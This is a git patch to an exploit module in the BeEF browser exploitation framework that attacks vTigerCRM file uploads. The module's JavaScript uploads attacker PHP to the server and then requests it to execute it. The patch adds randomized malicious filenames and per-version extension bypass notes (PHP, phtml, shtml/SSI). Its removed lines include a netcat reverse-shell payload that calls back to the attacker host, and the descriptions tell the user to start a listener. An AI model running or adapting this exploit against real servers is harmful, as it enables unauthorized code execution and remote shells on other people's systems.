From 12e93cd188cc007884db88d4d342380ad52a56f6 Mon Sep 17 00:00:00 2001 From: "yori.kvitchko" Date: Thu, 30 Jun 2011 20:19:29 +0000 Subject: [PATCH] Fixed to work with latest version of beef. Added random file naming and ability to change extension. Also added notes for new version of vTigerCRM. git-svn-id: https://beef.googlecode.com/svn/trunk@1043 b87d56ec-f9c0-11de-8c8a-61c5e9addfc9 --- .../vtiger_crm_upload_exploit/command.js | 37 ++++++++++++++----- .../vtiger_crm_upload_exploit/config.yaml | 2 +- .../vtiger_crm_upload_exploit/module.rb | 8 ++-- 3 files changed, 33 insertions(+), 14 deletions(-) diff --git a/modules/network/vtiger_crm_upload_exploit/command.js b/modules/network/vtiger_crm_upload_exploit/command.js index 236865722..3cad71a87 100644 --- a/modules/network/vtiger_crm_upload_exploit/command.js +++ b/modules/network/vtiger_crm_upload_exploit/command.js @@ -26,6 +26,22 @@ beef.execute(function() { baseurl = "<%= @vtiger_url %>"; + function get_ajax() { + var http_request; + // use the ActiveX control for IE5.x and IE6 + try { + http_request = new ActiveXObject("MSXML2.XMLHTTP"); + } catch (othermicrosoft){ + try { + http_request = new ActiveXObject("Microsoft.XMLHTTP"); + } catch (native) { + // If IE7, Mozilla, Safari, etc: Use native object + http_request = new XMLHttpRequest(); + } + } + return http_request; + } + function do_upload(){ setTimeout(function() {ajax_upload()}, 1000); } @@ -40,8 +56,11 @@ beef.execute(function() { function ajax_upload(){ var targeturl = baseurl + '/index.php?module=uploads&action=add2db&return_module=Home&return_action=index'; - http_request = false; - http_request = beef.net.get_ajax(); + var http_request; + + http_request = false; + http_request = get_ajax(); + if (!http_request) { // fail silently! return false; @@ -77,18 +96,16 @@ beef.execute(function() { + '\r\n' + boundary + '\r\n' - + 'Content-Disposition: form-data; name="filename"; filename="vtiger-fun.PHP"' + '\r\n' + + 'Content-Disposition: form-data; name="filename"; filename="<%= @mal_filename %>.<%= @mal_ext %>"' + '\r\n' + 'Content-Type: application/x-httpd-php' + '\r\n' + '\r\n' - + '<\?php' + '\r\n' + '<%= @vtiger_php %>' + '\r\n' - + '\?>' + '\r\n' + '\r\n' + boundary + '\r\n' + 'Content-Disposition: form-data; name="filename_hidden"' + '\r\n' + '\r\n' - + 'vtiger-fun.PHP' + + '<%= @mal_filename %>.<%= @mal_ext %>' + '\r\n' + boundary + '\r\n' @@ -137,14 +154,14 @@ beef.execute(function() { } else if (uploadstate == 3) { //We got a 200, so hopefully the file was uploaded //be_graceful(); - do_callfile(0,1000); + do_callfile(0, 1000); } },<%= @upload_timeout %>); return; } - function do_callfile(start,count){ + function do_callfile(start, count){ if (document.getElementById('vtigerimg') == null) { return false; } @@ -152,13 +169,13 @@ beef.execute(function() { for (i=start;i<=start+count;i++) { var http_request = false; - http_request = beef.net.get_ajax(); + http_request = get_ajax(); if (!http_request) { // fail silently! return false; } - var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_vtiger-fun.PHP"; + var findurl = baseurl + "<%= @vtiger_filepath %>" + i + "_<%= @mal_filename %>.<%= @mal_ext %>"; var requestbody = "birds of a feather flock together"; http_request.open('POST', findurl, false); diff --git a/modules/network/vtiger_crm_upload_exploit/config.yaml b/modules/network/vtiger_crm_upload_exploit/config.yaml index 5d1d01a51..4dbe58bc9 100644 --- a/modules/network/vtiger_crm_upload_exploit/config.yaml +++ b/modules/network/vtiger_crm_upload_exploit/config.yaml @@ -5,6 +5,6 @@ beef: category: "Network" name: "VTiger CRM Upload Exploit" description: "This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don't forget to start one, for example: nc -l 8888." - authors: ["wade", "bm", "pipes", "xntrik"] + authors: ["wade", "bm", "pipes", "xntrik", "yorikv"] target: working: ["ALL"] diff --git a/modules/network/vtiger_crm_upload_exploit/module.rb b/modules/network/vtiger_crm_upload_exploit/module.rb index 5dc7aa7e0..b61ca5902 100644 --- a/modules/network/vtiger_crm_upload_exploit/module.rb +++ b/modules/network/vtiger_crm_upload_exploit/module.rb @@ -15,14 +15,16 @@ class Vtiger_crm_upload_exploit < BeEF::Core::Command super({ 'Name' => 'VTiger CRM Upload Exploit', - 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888', + 'Description' => 'This module demonstrates chained exploitation. It will upload and execute a reverse bindshell. The vulnerability is exploited in the CRM vtiger 5.0.4
The default PHP requires a listener, so don\'t forget to start one, for example: nc -l 8888.

vTigerCRM 5.0.4: Use extension "PHP" and php code.
vTigerCRM 5.2.0: Use extension "phtml" and php code.
vTigerCRM 5.2.1: Use extensions "shtml" and SSI code.', 'Category' => 'Network', - 'Author' => ['wade', 'bm', 'pipes', 'xntrik'], + 'Author' => ['wade', 'bm', 'pipes', 'xntrik', 'yorikv'], 'Data' => [ {'name'=>'vtiger_url', 'ui_label' =>'Target Web Server','value'=>'http://vulnerable-vtiger.site','width'=>'400px'}, {'name'=>'vtiger_filepath','ui_label'=>'Target Directory','value'=>'/storage/'+time.year.to_s()+'/'+time.strftime("%B")+'/week'+weekno.to_s()+'/','width'=>'400px'}, - {'name'=>'vtiger_php','ui_label'=>'Injected PHP','value'=>'passthru("/bin/nc -e /bin/sh '+beef_host+' 8888");','type'=>'textarea','width'=>'400px','height'=>'100px'}, + {'name'=>'mal_filename','ui_label'=>'Malicious Filename','value'=>rand(32**10).to_s(32),'width'=>'400px'}, + {'name'=>'mal_ext','ui_label'=>'Malicious File Extension','value'=>'PHP','width'=>'400px'}, + {'name'=>'vtiger_php','ui_label'=>'Injected PHP (must escape single quotes)','value'=>'','type'=>'textarea','width'=>'400px','height'=>'100px'}, {'name'=>'upload_timeout','ui_label'=>'Upload Timeout','value'=>'5000'} ], 'File' => __FILE__